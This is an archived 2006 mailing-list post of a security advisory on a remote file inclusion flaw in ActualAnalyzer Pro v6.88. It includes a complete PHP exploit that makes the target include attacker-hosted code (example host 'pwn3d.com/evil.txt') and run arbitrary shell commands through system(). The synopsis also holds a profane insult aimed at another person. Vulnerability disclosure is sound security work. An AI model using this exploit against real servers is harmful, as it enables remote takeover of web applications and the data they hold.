lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <445F6311.7080801@gmail.com>
Date: Mon May  8 16:26:16 2006
From: wr0ck.lists at gmail.com (wr0ck)
Subject: [XPA] ActualAnalyzer Pro v6.88 - Remote Command
	Execution Vulnerability

=======================================================================================
XOR Crew :: Security Advisory 
       4/10/2006
=======================================================================================
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================

:: Summary

       Vendor       :  ActualScripts
       Vendor Site  :  http://www.actualscripts.com/
       Product(s)   :  ActualAnalyzer Pro v6.88
       Version(s)   :  All
       Severity     :  Medium/High
       Impact       :  Remote Command Execution
       Release Date :  4/10/2006
       Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

Pro Edition ? the professional solution for medium and large business 
web sites. The
ability to collect high detailed statistics about each separate page of 
web site will
help you effectively manage the overall Internet strategy and direction 
of company,
successfully optimize and develop him.

=======================================================================================

II. Synopsis

FUCK YOU 'ASHTETICO' 0hday releasing wh0re.

There is a remote file inclusion vulnerability that allows for remote 
command execution
in the /direct.php file.  The bug is here on lines 5-8:

if(!isset($rf)) $rf='./';

require $rf.'common/error.php';
require $rf.'common/global.php';
require $rf.'common/config.php';
require $rf.'common/dbaccess.php';

the $rf variable is not set prior to being used in the require() function.
The vendor and support team have been contacted.

=======================================================================================

Exploit code:

-----BEGIN-----

<?php
/*
ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to actualanalyzer/direct.php?rf=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" 
value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" 
value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" 
value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}

echo $form;

while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, D2K

=======================================================================================

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ